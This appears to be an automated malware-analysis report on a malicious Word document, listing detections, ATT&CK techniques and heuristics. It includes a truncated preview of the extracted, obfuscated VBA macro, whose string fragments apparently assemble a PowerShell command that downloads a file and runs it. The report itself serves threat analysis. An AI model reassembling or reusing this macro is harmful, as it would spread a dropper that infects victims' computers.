MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function, which is a critical finding, indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0', suggesting a phishing lure designed to drop further malware. The AutoOpen macro and legacy WordBasic markers also point to malicious intent.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 79917 bytes |
SHA-256: 3037242db1fae0a8f894a584b846c55486d09af864e69a55e69e9fec849c1a4c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "XXbfpXqwBzvIz"
Function tiYwHYBfwouWb()
On Error Resume Next
aQKOVIN = 871 / Rnd(4) + FRjZrVrTioYccj + pYnZWzNGOYD * 9 + Int(WNVsIoZ * CStr(pvjiPNLi)) + nhiVTsLCVZzrL * CDate(3624 - 352183467 * 84 / 475) / AoVVGJwPoC - CSng(620)
mSvjJowjMj = 871 / Rnd(4) + nWIBlDO + FWbcCJHFbMPkWc * 9 + Int(zwmViJLa * CStr(WkaiNFVwFhD)) + VMGfFWlEiJiL * CDate(3624 - 352183467 * 84 / 475) / KEwikpuv - CSng(620)
jfXEp = Mid("5WBwzjTqLcSAkk'+'vte+vteR7qOjjwwUnQC79sNu", 13, 12)
bIaaqL = 871 / Rnd(4) + qtsIJIojQbr + fDVJpnPcPi * 9 + Int(fqusFVsXsft * CStr(wTtMQIIutJT)) + RkzGcZaMMTMSO * CDate(3624 - 352183467 * 84 / 475) / jOXEwplaW - CSng(620)
wOrWEvapzdE = 871 / Rnd(4) + szcntQfnJKClhi + zhWYoWcMsQudCJ * 9 + Int(IfJNmmcW * CStr(TqqokKbKhzBCjo)) + YQkjXzndiCBWb * CDate(3624 - 352183467 * 84 / 475) / rGWKZFzjn - CSng(620)
cXavYiMRHA = 871 / Rnd(4) + wbwTHjhWXEaUV + vTEhQfGazzZu * 9 + Int(pKiErNIKAa * CStr(FclpvJqP)) + lIfkEKrkVdwuM * CDate(3624 - 352183467 * 84 / 475) / rMtAjGMb - CSng(620)
VCtmjth = Mid("LJQcUSwwZEY38aC4QtuNvte+vteuvte+vteas = vte+vteSvte+'+'vteu5envi2S+i2Ste+i2S+i2Svtevvte+vtei2S+i2S:vte+vtepublivte+vtec'+'vte+vt'+'e vte+vte+vte+v'+'te Uz9gKaUvte+v'+'tez9 vte+vte+ Su5i2S+i2Skaravzd5MkZO", 21, 175)
UvBorTtcz = 871 / Rnd(4) + ipkvCIFYrWp + CtzwfNLmjo * 9 + Int(rpsirKiprcIBhP * CStr(aWzciEdVEdKaZ)) + UAttpsFKdNOI * CDate(3624 - 352183467 * 84 / 475) / zutrRjnnppGJ - CSng(620)
bsdIYoaa = 871 / Rnd(4) + YjEvwXwrtNtl + RkACMbWzijE * 9 + Int(RZckwNTO * CStr(kHMjaasJzCIwv)) + UHdpsHktDAn * CDate(3624 - 352183467 * 84 / 475) / wVGwAaXohco - CSng(620)
obzYwiUXcfG = 871 / Rnd(4) + NUnAjjJFWcPHsW + PsjOVYfbKltr * 9 + Int(wfKnkuflWchi * CStr(abSikZNBXwGrnW)) + tdOnsXJrRcXz * CDate(3624 - 352183467 * 84 / 475) / BsQCkWzEIjBTi - CSng(620)
jubuKLiBT = Mid("sn8fjNnMEsya.cvti2S+i2Se+vteomvte+vte/vte+vteV8vte+'+'vte8bOR2RSfkaWwPstvzu", 11, 49)
jJnFLYci = 871 / Rnd(4) + lBiqfdvJVt + cTYbGCqD * 9 + Int(svbWCCBi * CStr(HzsTHDqduOZ)) + iJENidc * CDate(3624 - 352183467 * 84 / 475) / RlrYcdqZHnccNi - CSng(620)
LcVikLljkJ = 871 / Rnd(4) + PSrOKDHRVVsq + VPJOXsiuOW * 9 + Int(SCCkAuh * CStr(ZNGwNnoKvlH)) + AzWwSwF * CDate(3624 - 352183467 * 84 / 475) / JHlAvpwHBXQa - CSng(620)
XGoLwt = 871 / Rnd(4) + wPJLUkdIb + HOlXIYZZjJV * 9 + Int(TqiNQWG * CStr(zrwuIwURHOoc)) + uVOECwODC * CDate(3624 - 352183467 * 84 / 475) / ZtpvShHTGBq - CSng(620)
YEanokn = Mid("5d4J0tV7s6SAtcranc.Dvte+vteownlovte+vteadFii2S+i2Svte+vte'+'lvte+vtee(vte+vteSu5abc.vte+vteTovte+vteStvt'+'e+i2S+i2Svtervte+vESRYhnlw", 15, 111)
ThWLGJi = 871 / Rnd(4) + RRLPSvajhmJGT + SjGRCpw * 9 + Int(RbFBXrjJY * CStr(hPjiKhzCfz)) + VcucodbvFOl * CDate(3624 - 352183467 * 84 / 475) / zzjJRYjDYOoZD - CSng(620)
kAwXNrCLCa = 871 / Rnd(4) + hbiqYqoazu + GrtoqMUD * 9 + Int(NoVPYIqbBARQo * CStr(wFXCcshn)) + tcFwHYd * CDate(3624 - 352183467 * 84 / 475) / XbCGtGPSQAMY - CSng(620)
Akboj = 871 / Rnd(4) + kVYSAJwqv + LZjNEOSGvZkibX * 9 + Int(dwvDHnUYWtGW * CStr(NbrIDkwroVwJv)) + dihCtBjWNCno * CDate(3624 - 352183467 * 84 / 475) / qBMUwsit - CSng(620)
pvIcYdH = Mid("jevte+vte-Itevte+vtem(Si2S+iSik1LDEslo08PjSAV5su3l63MD", 2, 27)
NfztjV = 871 / Rnd(4) + cuRiziTJsKJaic + TJiDYPtplCDz * 9 + Int(kLsUOJQh * CStr(QKpKbiQtjKicw)) + SJAhjFjf * CDate(3624 - 352183467 * 84 / 475) / jKZhSoLZLEjtYO - CSng(620)
TwkTmV = 871 / Rnd(4) + HSpjQdi + vTaQrTOU * 9 + Int(cYmnwuF * CStr(mWICGAHrMYUn)) + LTORjFhq * CDate(3624 - 352183467 * 84 / 475) / vWzULdVOL - CSng(620)
zmOBkW = 871 / Rnd(4) + nPYsWtUfl + aLOchcH * 9 + Int(QFzCzwFUkSYS * CStr(tultUjnJA)) + fndscwzic * CDate(3624 - 352183467 * 84 / 475) / IHIPlRanBI - CSng(620)
EVWWJhuhiuC = Mid("IDff6 (('(('+'i2S . ( Q0reNv:COmsPec[4,15,25]-joinvtevte) ((vteSu5franv'+'te+vt'+'ec = new-obvte+vtejecvi2S+i2Ste+vtet vte+vteSystem.Nevte+i2S+JiW3zFO7i6Lrid20QmwsLt
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.